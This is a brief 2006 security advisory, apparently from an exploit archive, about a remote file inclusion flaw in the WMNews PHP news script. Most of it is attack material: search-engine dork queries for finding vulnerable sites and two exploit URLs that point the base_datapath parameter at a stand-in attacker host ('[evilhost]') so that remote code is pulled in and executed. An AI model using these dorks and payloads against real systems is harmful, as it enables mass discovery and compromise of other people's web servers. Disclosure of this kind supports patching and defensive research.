WMNews suffers from a remote file inclusion vulnerability.
98b7bae8e8dffa9da5136497722726c556ef8d4cde3d3d0dce85fb2630f2989a
Advisory: WMNews Remote File Include Vulnerability
Release Date: 2006/07/26
Author: uNfz
Critical Level: High
Contact: unfzbr@hotmail.com
Vendor: Warta Mikael
--------------------
--------------------
Searching / Dork:
allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php
--------------------
exploration:
/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]
--------------------
uNfz
irc.efnet.org